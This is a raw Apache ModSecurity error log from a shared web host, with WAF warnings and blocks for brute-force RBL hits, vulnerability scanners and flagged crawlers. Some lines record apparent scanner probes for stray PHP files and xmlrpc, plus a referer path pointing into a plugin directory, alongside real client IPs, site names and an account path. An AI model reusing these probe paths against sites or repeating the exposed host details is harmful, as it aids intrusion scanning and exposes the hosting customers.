[Tue May 26 12:59:56.351573 2026] [security2:error] [pid 470766:tid 471001] [client 45.148.10.204:33912] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gdgAAAGk"]
[Tue May 26 12:59:56.430740 2026] [security2:error] [pid 470766:tid 471022] [client 45.148.10.204:33922] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gfQAAAH4"]
[Tue May 26 12:59:56.460571 2026] [security2:error] [pid 470766:tid 470943] [client 45.148.10.204:33934] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gfgAAAC8"]
[Tue May 26 12:59:56.542344 2026] [security2:error] [pid 470766:tid 471023] [client 45.148.10.204:33932] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7ggwAAAH8"]
[Tue May 26 12:59:56.559483 2026] [security2:error] [pid 470766:tid 470959] [client 45.148.10.204:33946] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7ghQAAAD8"]
[Tue May 26 12:59:56.576891 2026] [security2:error] [pid 470766:tid 470956] [client 45.148.10.204:33926] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7ghAAAADw"]
[Tue May 26 12:59:56.662194 2026] [security2:error] [pid 470766:tid 471004] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gfAAAAGw"]
[Tue May 26 12:59:56.720374 2026] [security2:error] [pid 470766:tid 470948] [client 45.148.10.204:33954] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7giAAAADQ"]
[Tue May 26 12:59:56.721743 2026] [security2:error] [pid 470766:tid 470961] [client 45.148.10.204:33968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7giwAAAEE"]
[Tue May 26 12:59:56.779678 2026] [security2:error] [pid 470766:tid 470898] [client 119.93.249.179:59912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.249.93.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/xmlrpc.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gkAAAAAI"]
[Tue May 26 12:59:56.779861 2026] [security2:error] [pid 470766:tid 470898] [client 119.93.249.179:59912] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jhonparra.com"] [uri "/xmlrpc.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gkAAAAAI"]
[Tue May 26 12:59:56.902332 2026] [security2:error] [pid 470766:tid 470953] [client 45.148.10.204:33982] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7glAAAADk"]
[Tue May 26 12:59:57.078573 2026] [security2:error] [pid 470766:tid 471014] [client 45.148.10.204:33988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7glwAAAHY"]
[Tue May 26 12:59:58.026565 2026] [security2:error] [pid 470766:tid 470910] [client 185.191.171.13:18996] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/rec/day/2026-05-05/"] [unique_id "ahVL9ujO_W1DqEcFHQ7gtAAAAA4"]
[Tue May 26 12:59:58.026711 2026] [security2:error] [pid 470766:tid 470910] [client 185.191.171.13:18996] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/rec/day/2026-05-05/"] [unique_id "ahVL9ujO_W1DqEcFHQ7gtAAAAA4"]
[Tue May 26 12:59:58.410744 2026] [security2:error] [pid 470766:tid 470933] [client 4.201.75.230:5366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/abcd.php"] [unique_id "ahVL9ujO_W1DqEcFHQ7gwAAAACU"]
[Tue May 26 12:59:58.773236 2026] [core:crit] [pid 470766:tid 470906] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:59:59.127701 2026] [security2:error] [pid 470766:tid 470973] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL9ujO_W1DqEcFHQ7gzgAAAE0"]
[Tue May 26 12:59:59.806256 2026] [security2:error] [pid 470766:tid 470903] [client 74.7.175.136:58136] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahVL9-jO_W1DqEcFHQ7g6AAAAAc"]
[Tue May 26 13:00:00.186524 2026] [security2:error] [pid 470766:tid 470981] [client 4.201.75.230:5681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/as.php"] [unique_id "ahVL-OjO_W1DqEcFHQ7g7wAAAFU"]
[Tue May 26 13:00:01.147995 2026] [security2:error] [pid 470766:tid 471004] [client 157.20.138.61:55216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL-ejO_W1DqEcFHQ7hCAAAAGw"]
[Tue May 26 13:00:01.148161 2026] [security2:error] [pid 470766:tid 471004] [client 157.20.138.61:55216] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL-ejO_W1DqEcFHQ7hCAAAAGw"]
[Tue May 26 13:00:01.331721 2026] [security2:error] [pid 470766:tid 470996] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL-OjO_W1DqEcFHQ7hAQAAAGQ"]
[Tue May 26 13:00:02.120381 2026] [security2:error] [pid 470766:tid 470993] [client 216.234.215.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL-ejO_W1DqEcFHQ7hFwAAAGE"]
[Tue May 26 13:00:02.352424 2026] [security2:error] [pid 470766:tid 470906] [client 4.201.75.230:5372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-trackback.php"] [unique_id "ahVL-ujO_W1DqEcFHQ7hKgAAAAo"]
[Tue May 26 13:00:04.577597 2026] [security2:error] [pid 470766:tid 471000] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL_OjO_W1DqEcFHQ7hVwAAAGg"]
[Tue May 26 13:00:06.485554 2026] [security2:error] [pid 470766:tid 470955] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL_ujO_W1DqEcFHQ7hgAAAADs"]
[Tue May 26 13:00:06.527758 2026] [security2:error] [pid 470766:tid 470824] [remote 74.7.241.58:34264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVL_ujO_W1DqEcFHQ7hjgAAZDk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 13:00:08.911540 2026] [security2:error] [pid 470766:tid 470899] [client 4.201.75.230:5317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/about.php"] [unique_id "ahVMAOjO_W1DqEcFHQ7hwAAAAAM"]
[Tue May 26 13:00:09.542734 2026] [security2:error] [pid 470766:tid 471018] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMAejO_W1DqEcFHQ7hxwAAAHo"]
[Tue May 26 13:00:11.818037 2026] [security2:error] [pid 470766:tid 470929] [client 157.20.138.61:55574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMA-jO_W1DqEcFHQ7h-wAAACE"]
[Tue May 26 13:00:11.818215 2026] [security2:error] [pid 470766:tid 470929] [client 157.20.138.61:55574] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMA-jO_W1DqEcFHQ7h-wAAACE"]
[Tue May 26 13:00:11.972166 2026] [security2:error] [pid 470766:tid 470933] [client 4.201.75.230:5632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/file.php"] [unique_id "ahVMA-jO_W1DqEcFHQ7iAwAAACU"]
[Tue May 26 13:00:12.310454 2026] [security2:error] [pid 470766:tid 471023] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMA-jO_W1DqEcFHQ7h_gAAAH8"]
[Tue May 26 13:00:14.264213 2026] [security2:error] [pid 470766:tid 471004] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMBejO_W1DqEcFHQ7iNwAAAGw"]
[Tue May 26 13:00:14.540845 2026] [security2:error] [pid 470766:tid 470974] [client 4.201.75.230:5346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/adminfuns.php"] [unique_id "ahVMBujO_W1DqEcFHQ7iSAAAAE4"]
[Tue May 26 13:00:17.372809 2026] [security2:error] [pid 470766:tid 470952] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMCOjO_W1DqEcFHQ7ijQAAADg"]
[Tue May 26 13:00:19.354283 2026] [security2:error] [pid 470766:tid 470961] [client 4.201.75.230:5356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-good.php"] [unique_id "ahVMC-jO_W1DqEcFHQ7i1AAAAEE"]
[Tue May 26 13:00:19.496349 2026] [security2:error] [pid 470766:tid 470852] [remote 45.32.67.165:60758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVMC-jO_W1DqEcFHQ7i0AAAD1U"]
[Tue May 26 13:00:19.670587 2026] [security2:error] [pid 470766:tid 471000] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMC-jO_W1DqEcFHQ7izgAAAGg"]
[Tue May 26 13:00:21.802352 2026] [security2:error] [pid 470766:tid 471019] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMDejO_W1DqEcFHQ7i_QAAAHs"]
[Tue May 26 13:00:22.219353 2026] [security2:error] [pid 470766:tid 471012] [client 157.20.138.61:55933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jDAAAAHQ"]
[Tue May 26 13:00:22.219470 2026] [security2:error] [pid 470766:tid 471012] [client 157.20.138.61:55933] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jDAAAAHQ"]
[Tue May 26 13:00:22.243148 2026] [security2:error] [pid 470766:tid 470897] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jCwAAAAE"]
[Tue May 26 13:00:22.518030 2026] [security2:error] [pid 470766:tid 470936] [client 4.201.75.230:5365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xmlrpc.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jDQAAACg"]
[Tue May 26 13:00:23.834767 2026] [security2:error] [pid 470766:tid 470926] [client 66.249.64.41:57327] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jFAAAAB4"], referer: https://mosykay.com/prizes/124015561
[Tue May 26 13:00:24.522893 2026] [security2:error] [pid 470766:tid 470921] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMEOjO_W1DqEcFHQ7jLgAAABk"]
[Tue May 26 13:00:24.902146 2026] [security2:error] [pid 470766:tid 470986] [client 66.249.64.42:53022] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMD-jO_W1DqEcFHQ7jKAAAAFo"], referer: https://mosykay.com/prizes/124015561
[Tue May 26 13:00:25.830752 2026] [security2:error] [pid 470766:tid 470792] [remote 52.66.96.197:35074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVMEejO_W1DqEcFHQ7jTQAAWxk"]
[Tue May 26 13:00:26.508517 2026] [security2:error] [pid 470766:tid 470912] [client 14.228.205.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMEujO_W1DqEcFHQ7jWgAAABA"]
[Tue May 26 13:00:27.197383 2026] [security2:error] [pid 470766:tid 470956] [client 4.201.75.230:5337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/goods.php"] [unique_id "ahVME-jO_W1DqEcFHQ7jewAAADw"]
[Tue May 26 13:00:27.522534 2026] [security2:error] [pid 470766:tid 470921] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVME-jO_W1DqEcFHQ7jdgAAABk"]
[Tue May 26 13:00:29.238078 2026] [core:error] [pid 470766:tid 470947] [client 194.164.107.5:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:00:29.238098 2026] [core:error] [pid 470766:tid 470947] [client 194.164.107.5:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:00:29.619435 2026] [security2:error] [pid 470766:tid 471006] [client 138.229.101.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMFejO_W1DqEcFHQ7jyQAAAG4"], referer: https://www.anujtradingco.com/
[Tue May 26 13:00:30.045258 2026] [security2:error] [pid 470766:tid 471009] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMFejO_W1DqEcFHQ7jzQAAAHE"]
